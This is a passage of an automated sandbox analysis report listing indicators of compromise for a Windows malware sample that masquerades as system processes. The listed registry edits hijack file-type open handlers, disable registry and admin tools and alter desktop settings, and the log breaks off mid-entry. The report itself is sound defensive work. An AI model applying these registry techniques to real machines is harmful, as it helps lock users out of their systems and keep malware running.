LSASS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" SERVICES.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" SERVICES.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" Lubang Hitam.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" SMSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" SMSS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" WINLOGON.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ CSRSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" LSASS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" LSASS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" SERVICES.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\DESTRU~1.SCR" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" WINLOGON.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" SMSS.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\SwapMouseButtons = "1" WINLOGON.EXE Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Mouse\ CSRSS.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0" Black Hole.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" Lubang Hitam.exe Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\Desktop\ScreenSaveTimeOut = "600" CSRSS.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Lubang Hitam.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Lubang Hitam.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 2584 Black Hole.exe 2584 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe 4692 Black Hole.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1452 shutdown.exe Token: SeRemoteShutdownPrivilege 1452 shutdown.exe Token: SeShutdownPrivilege 4892 shutdown.exe Token: SeRemoteShutdownPrivilege 4892 shutdown.exe Token: SeShutdownPrivilege 1036 shutdown.exe Token: SeRemoteShutdownPrivilege 1036 shutdown.exe Token: SeShutdownPrivilege 2352 shutdown.exe Token: SeRemoteShutdownPrivilege 2352 shutdown.exe Token: SeShutdownPrivilege 3304 shutdown.exe Token: SeRemoteShutdownPrivilege 3304 shutdown.exe Token: SeShutdownPrivilege 2372 shutdown.exe Token: SeRemoteShutdownPrivilege 2372 shutdown.exe Token: SeShutdownPrivilege 4460 shutdown.exe Token: SeRemoteShutdownPrivilege 4460 shutdown.exe Token: SeShutdownPrivilege 3740 shutdown.exe Token: SeRemoteShutdownPrivilege 3740 shutdown.exe Token: SeShutdownPrivilege 1840 shutdown.exe Token: SeRemoteShutdownPrivilege 1840 shutdown.exe Token: SeShutdownPrivilege 1400 shutdown.exe Token: SeRemoteShutdownPrivilege 1400 shutdown.exe Token: SeShutdownPrivilege 3532 shutdown.exe Token: SeRemoteShutdownPrivilege 3532 shutdown.exe Token: SeShutdownPrivilege 2340 shutdown.exe Token: SeRemoteShutdownPrivilege 2340 shutdown.exe Token: SeShutdownPrivilege 1580 shutdown.exe Token: SeRemoteShutdownPrivilege 1580 shutdown.exe Token: SeShutdownPrivilege 5068 shutdown.exe Token: SeRemoteShutdownPrivilege 5068 shutdown.exe Token: SeShutdownPrivilege 1084 shutdown.exe Token: SeRemoteShutdownPrivilege 1084 shutdown.exe Token: SeShutdownPrivilege 3712 shutdown.exe Token: SeRemoteShutdownPrivilege 3712 shutdown.exe Token: SeShutdownPrivilege 2244 shutdown.exe Token: SeRemoteShutdownPrivilege 2244 shutdown.exe Token: SeShutdownPrivilege 2200 shutdown.exe Token: SeRemoteShutdownPrivilege 2200 shutdown.exe Token: SeShutdownPrivilege 3028 shutdown.exe Token: SeRemoteShutdownPrivilege 3028 shutdown.exe Token: SeShutdownPrivilege 1196 shutdown.exe Token: SeRemoteShutdownPrivilege 1196 shutdown.exe Token: SeShutdownPrivilege 4268 shutdown.exe Token: SeRemoteShutdownPrivilege 4268 shutdown.exe Token: SeShutdownPrivilege 4752 shutdown.exe Token: SeRemoteShutdownPrivilege 4752 shutdown.exe Token: SeShutdownPrivilege 3644 shutdown.exe Token: SeRemoteShutdownPrivilege 3644 shutdown.exe Token: SeShutdownPrivilege 928 shutdown.exe Token: SeRemoteShutdownPrivilege 928 shutdown.exe Token: SeShutdownPrivilege 3140 shutdown.exe Token: SeRemoteShutdownPrivilege 3140 shutdown.exe Token: SeShutdownPrivilege 1396 shutdown.exe Token: SeRemoteShutdownPrivilege 1396 shutdown.exe Token: SeShutdownPrivilege 4764 shutdown.exe Token: SeRemoteShutdownPrivilege 4764 shutdown.exe Token: SeShutdownPrivilege 4772 shutdown.exe Token: SeRemoteShutdownPrivilege 4772 shutdown.exe Token: SeShutdownPrivilege 3600 shutdown.exe Token: SeRemoteShutdownPrivilege 3600 shutdown.exe Token: SeShutdownPrivilege 1020 shutdown.exe Token: SeRemoteShutdownPrivilege 1020 shutdown.exe Token: SeShutdownPrivilege 1528 shutdown.exe Token: SeRemoteShutdownPrivilege 1528 shutdown.exe Token: SeShutdownPrivilege 3764 shutdown.exe Token: SeRemoteShutdownPrivilege 3764 shutdown.exe -
Suspicious use of SetWindowsHookEx 57 IoCs
pid Process 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 2584 Black Hole.exe 4040 Lubang Hitam.exe 3820 WINLOGON.EXE 816 CSRSS.EXE 3496 SERVICES.EXE 2248 LSASS.EXE 4632 SMSS.EXE 4692 Black Hole.exe 1776 Black Hole.exe 1952 Lubang Hitam.exe 2264 WINLOGON.EXE 4768 Lubang Hitam.exe 5096 CSRSS.EXE 2100 Black Hole.exe 4840 WINLOGON.EXE 4784 Lubang Hitam.exe 3320 SERVICES.EXE 3104 WINLOGON.EXE 2460 Black Hole.exe 2156 CSRSS.EXE 2180 LSASS.EXE 2092 Lubang Hitam.exe 4064 WINLOGON.EXE 4572 SERVICES.EXE 1372 Black Hole.exe 4032 CSRSS.EXE 940 SMSS.EXE 4152 Lubang Hitam.exe 1400 LSASS.EXE 1952 SERVICES.EXE 4964 CSRSS.EXE 4740 WINLOGON.EXE 3216 LSASS.EXE 1732 SMSS.EXE 4924 SERVICES.EXE 2704 CSRSS.EXE 4080 SMSS.EXE 4424 LSASS.EXE 1852 SMSS.EXE 3044 SERVICES.EXE 2920 Black Hole.exe 888 Lubang Hitam.exe 2100 LSASS.EXE 4780 WINLOGON.EXE 3360 SMSS.EXE 4452 CSRSS.EXE 3016 SERVICES.EXE 1820 Black Hole.exe 1396 LSASS.EXE 2452 Lubang Hitam.exe 2060 SMSS.EXE 116 WINLOGON.EXE 320 CSRSS.EXE 4800 SERVICES.EXE 1464 LSASS.EXE 4328 SMSS.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1508 wrote to memory of 1452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 83 PID 1508 wrote to memory of 1452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 83 PID 1508 wrote to memory of 1452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 83 PID 1508 wrote to memory of 2616 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 85 PID 1508 wrote to memory of 2616 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 85 PID 1508 wrote to memory of 2616 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 85 PID 1508 wrote to memory of 1336 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 87 PID 1508 wrote to memory of 1336 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 87 PID 1508 wrote to memory of 1336 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 87 PID 1508 wrote to memory of 732 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 88 PID 1508 wrote to memory of 732 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 88 PID 1508 wrote to memory of 732 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 88 PID 1508 wrote to memory of 5040 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 89 PID 1508 wrote to memory of 5040 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 89 PID 1508 wrote to memory of 5040 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 89 PID 1508 wrote to memory of 2916 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 90 PID 1508 wrote to memory of 2916 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 90 PID 1508 wrote to memory of 2916 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 90 PID 1508 wrote to memory of 3048 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 91 PID 1508 wrote to memory of 3048 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 91 PID 1508 wrote to memory of 3048 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 91 PID 1508 wrote to memory of 2472 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 92 PID 1508 wrote to memory of 2472 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 92 PID 1508 wrote to memory of 2472 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 92 PID 1508 wrote to memory of 3228 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 93 PID 1508 wrote to memory of 3228 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 93 PID 1508 wrote to memory of 3228 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 93 PID 1508 wrote to memory of 5000 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 94 PID 1508 wrote to memory of 5000 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 94 PID 1508 wrote to memory of 5000 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 94 PID 1508 wrote to memory of 2452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 95 PID 1508 wrote to memory of 2452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 95 PID 1508 wrote to memory of 2452 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 95 PID 1508 wrote to memory of 3180 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 96 PID 1508 wrote to memory of 3180 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 96 PID 1508 wrote to memory of 3180 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 96 PID 1508 wrote to memory of 4256 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 97 PID 1508 wrote to memory of 4256 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 97 PID 1508 wrote to memory of 4256 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 97 PID 1508 wrote to memory of 4348 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 98 PID 1508 wrote to memory of 4348 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 98 PID 1508 wrote to memory of 4348 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 98 PID 1508 wrote to memory of 4252 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 99 PID 1508 wrote to memory of 4252 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 99 PID 1508 wrote to memory of 4252 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 99 PID 1508 wrote to memory of 3756 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 100 PID 1508 wrote to memory of 3756 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 100 PID 1508 wrote to memory of 3756 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 100 PID 1508 wrote to memory of 4360 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 101 PID 1508 wrote to memory of 4360 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 101 PID 1508 wrote to memory of 4360 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 101 PID 1508 wrote to memory of 4772 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 102 PID 1508 wrote to memory of 4772 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 102 PID 1508 wrote to memory of 4772 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 102 PID 1508 wrote to memory of 4840 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 103 PID 1508 wrote to memory of 4840 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 103 PID 1508 wrote to memory of 4840 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 103 PID 1508 wrote to memory of 4064 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 104 PID 1508 wrote to memory of 4064 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 104 PID 1508 wrote to memory of 4064 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 104 PID 1508 wrote to memory of 4368 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 105 PID 1508 wrote to memory of 4368 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 105 PID 1508 wrote to memory of 4368 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 105 PID 1508 wrote to memory of 1192 1508 d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe 107 -
System policy modification 1 TTPs 64 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayItemsDisplay = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoPwdPage = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoAdminPage = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecycleFiles = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" LSASS.EXE Set value (int) 